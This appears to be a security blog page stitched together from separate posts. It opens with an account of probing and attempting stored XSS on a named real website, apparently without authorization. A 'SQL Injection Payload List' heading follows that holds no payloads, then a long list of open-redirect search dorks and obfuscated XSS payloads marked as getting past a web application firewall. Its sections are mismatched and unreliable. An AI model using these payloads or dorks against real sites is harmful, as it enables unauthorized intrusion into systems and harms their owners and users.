Stored XSS on h2biz.net

I was surfing the internet when I came across this web portal http://www.h2biz.net which I found to be vulnerable to Reflected XSS. So I attempted to make a Stored XSS because I noticed a kind of message board. I have created a temporary email for registering on the website, then I completed the registration phase….

SQL Injection Payload List

In this section, we’ll explain what SQL injection is, describe some common examples, explain how to find and exploit various kinds of SQL injection vulnerabilities, and summarize how to prevent SQL injection.

What is SQL injection (SQLi)?

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application’s content or behavior.

In some situations, an attacker can escalate an SQL injection attack to compromise the underlying server or other back-end infrastructure, or perform a denial-of-service attack.

Top 100 Open Redirect dorks


Just like previous list of XSS dorks but this time for Open Redirect vulnerabilities.

First with most common parameters then parameters along with path.

page 19.3%
url 13.1%
ret 10.0%
r2 9.8%
img 7.0%
u 4.4%
return 2.6%
r 2.6%
URL 2.4%
next 2.0%
redirect 2.0%
redirectBack 1.6%
AuthState 1.2%
referer 0.8%
redir 0.8%
l 0.8%
aspxerrorpath 0.6%
image_path 0.6%
ActionCodeURL 0.6%
return_url 0.6%
link 0.6%
q 0.6%
location 0.6%
ReturnUrl 0.6%
uri 0.4%
referrer 0.4%
returnUrl 0.4%
forward 0.4%
file 0.4%
rb 0.4%
end_display 0.4%
urlact 0.4%
from 0.4%
goto 0.4%
path 0.4%
redirect_url 0.4%
old 0.4%
pathlocation 0.2%
successTarget 0.2%
returnURL 0.2%
urlsito 0.2%
newurl 0.2%
Url 0.2%
back 0.2%
retour 0.2%
odkazujuca_linka 0.2%
r_link 0.2%
cur_url 0.2%
H_name 0.2%
ref 0.2%
topic 0.2%
resource 0.2%
returnTo 0.2%
home 0.2%
node 0.2%
sUrl 0.2%
href 0.2%
linkurl 0.2%
returnto 0.2%
redirecturl 0.2%
SL 0.2%
st 0.2%
errorUrl 0.2%
media 0.2%
destination 0.2%
targeturl 0.2%
return_to 0.2%
cancel_url 0.2%
doc 0.2%
GO 0.2%
ReturnTo 0.2%
anything 0.2%
FileName 0.2%
logoutRedirectURL 0.2%
list 0.2%
startUrl 0.2%
service 0.2%
redirect_to 0.2%
end_url 0.2%
_next 0.2%
noSuchEntryRedirect 0.2%
context 0.2%
returnurl 0.2%
ref_url 0.2%
/?page= 18.5
/index.php?ret= 10.0
/analytics/hit.php?r2= 9.8
/api/thumbnail?img= 7.0
/e.html?u= 3.2
/actions/act_continueapplication.cfm?r= 2.4
/redirect2/?url= 2.0
/Shibboleth.sso/Logout?return= 1.2
/ui/clear-selected/?next= 1.2
/Home/Redirect?url= 1.2
/jobs/?l= 0.8
/Error.aspx?aspxerrorpath= 0.6
/r.php?u= 0.6
/services/logo_handler.ashx?image_path= 0.6
/AddProduct.aspx?ActionCodeURL= 0.6
/tools/login/default.asp?page= 0.6
/spip.php?url= 0.6
/usermanagement/mailGeneratedPassword?referer= 0.6
/?return= 0.6
/?redir= 0.6
/simplesaml/module.php/core/loginuserpass.php?AuthState= 0.6
/out.php?url= 0.6
/affiche.php?uri= 0.4
/redirector.php?url= 0.4
/cgi/set_lang?referrer= 0.4
/blog/click?url= 0.4
/site.php?url= 0.4
/download2.php?file= 0.4
/jump.php?url= 0.4
/redirect/?redirect= 0.4
/admin/track/track?redirect= 0.4
/switch.php?rb= 0.4
/php-scripts/form-handler.php?end_display= 0.4
/cg/rk/?url= 0.4
/tosite.php?url= 0.4
/cambioidioma.php?urlact= 0.4
/accueil/spip.php?url= 0.4
/IRB/sd/Rooms/RoomComponents/LoginView/GetSessionAndBack?redirectBack= 0.4
/search?q= 0.4
/default.aspx?URL= 0.4
/initiate-sso-login/?redirect_url= 0.4
/module.php/core/loginuserpass.php?AuthState= 0.4
/authentication/check_login?old= 0.4
/RedirectToDoc.aspx?URL= 0.4
/shop/bannerhit.php?url= 0.4
/acceptcookies/?ReturnUrl= 0.4
/index.php?url= 0.4
/publang?url= 0.2
/home/helperpage?url= 0.2
/widgets.aspx?url= 0.2
/_lang/en?next= 0.2
/application/en?url= 0.2
/common/topcorm.do?pathlocation= 0.2
/main/action?successTarget= 0.2
/Videos/SetCulture?returnURL= 0.2
/Localize/ChangeLang?returnUrl= 0.2
/_goToSite.asp?urlsito= 0.2
/redir?url= 0.2
/admin/auth/logined?redirect= 0.2
/linkforward?forward= 0.2
/modules/babel/redirect.php?newurl= 0.2
/umbraco/Surface/LanguageSurface/ChangeLanguage?Url= 0.2
/langswitcher.php?url= 0.2
/redirect/?url= 0.2
/i18n/i18n_user_currencies/change_currency?back= 0.2
/accessibilite/textBackUp/?retour= 0.2
/fncBox.php?url= 0.2
/all4shop-akcie.php?odkazujuca_linka= 0.2
/openurl.php?url= 0.2
/te3/out.php?u= 0.2
/utils/set_language.html?return_url= 0.2
/trigger.php?r_link= 0.2
/home/lng?cur_url= 0.2
/goto?url= 0.2
/o.php?url= 0.2
/link-master/19/follow?link= 0.2
/hack.php?H_name= 0.2
/bmad/namhoc.php?return= 0.2
/maven/stats.asp?ref= 0.2
/Main/WebHome?topic= 0.2
/bin/fusion/imsLogin?resource= 0.2
/languechange.aspx?url= 0.2
/bloques/bannerclick.php?url= 0.2
/changesiteversion-full?referer= 0.2
/out.php?link= 0.2
/bgpage?r= 0.2
/signout?returnTo= 0.2
/switch_lang.php?return_url= 0.2
/nousername.php?redir= 0.2
/i/logout?return= 0.2
/util_goto_detail_home.cfm?home= 0.2
/misc/oldmenu.html?from= 0.2
/click.php?url= 0.2
/bitrix/rdc/?goto= 0.2
/?node= 0.2
/setLanguage.php?return= 0.2
/redirect/ad?url= 0.2
/redirect.php?sUrl= 0.2
/redirect?url= 0.2
/url?url= 0.2

XSS WAF Bypassed

</script><svg onload=alert(1)> = (Error)
</script><!–><svg onload%3Da%3Dalert,b%3D1,[b].find(a)> = (OK)

</script><svg onload=alert(1)> = (Error)
</script/<K><svg onload%3Da%3Dalert,b%3D1,[b].find%26rpar;a%26%2341;> = (OK)

<a href=”javascript:alert(1)”>href</a> = (Error)
<A aAaAaAa AaAaAaA aAaA hReF%3D”%26%2301j%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt%26%2341;”>href</a> = (OK)

<input value=”testtest” onclick=”alert(1)”> = (Error)
<form><input formaction=javascript:alert(1) type=submit value=click> = (OK)

<img src=x onerror=alert(1)> = (Error)
<img src=x:alert(alt) onerror=eval(src) alt=1> = (OK)

‘-confirm(1)-‘ = (Error)
<!’/!”/\’/\”/*/-top[`con\x66irm`]`1`//><svg> = (OK)

<img src=x onerror=alert(1)> = (Error)
<img src onerror=%26emsp;prompt`${1}`> = (OK)

Thank’s You, And best regards!!!

Youtube : https://www.youtube.com/channel/UCyVj0erForx8gUDNAp8wzLw
Facebook : https://www.facebook.com/b4c0d
Gmail : [email protected]
Paypal : paypal.me/Rando784